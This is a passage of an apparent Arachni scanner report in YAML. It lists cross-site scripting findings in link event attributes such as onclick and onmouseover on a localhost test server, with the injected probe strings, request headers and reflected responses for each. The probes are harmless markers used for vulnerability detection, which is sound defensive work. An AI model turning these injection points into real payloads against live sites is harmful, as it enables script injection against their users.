      :id: <a href="/" onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeydown=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeydown</a><a href='/' onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a><a href='/' onkeydown='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeydown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onkeydown?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onkeypress?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onkeypress?input=default
      :id: <a href="/" onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeypress=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeypress</a><a href='/' onkeypress="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a><a href='/' onkeypress='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeypress</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onkeypress?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onkeyup?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onkeyup?input=default
      :id: <a href="/" onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeyup=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeyup</a><a href='/' onkeyup="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a><a href='/' onkeyup='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeyup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onkeyup?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onclick?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onclick?input=default
      :id: <a href="/" onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onclick=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onclick</a><a href='/' onclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a><a href='/' onclick='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onclick?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/ondblclick?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/ondblclick?input=default
      :id: <a href="/" ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' ondblclick=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>ondblclick</a><a href='/' ondblclick="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a><a href='/' ondblclick='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>ondblclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/ondblclick?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onmousedown?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onmousedown?input=default
      :id: <a href="/" onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousedown=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousedown</a><a href='/' onmousedown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a><a href='/' onmousedown='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousedown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onmousedown?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onmousemove?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onmousemove?input=default
      :id: <a href="/" onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousemove=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousemove</a><a href='/' onmousemove="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a><a href='/' onmousemove='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousemove</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onmousemove?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onmouseout?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "427"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onmouseout?input=default
      :id: <a href="/" onmouseout="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
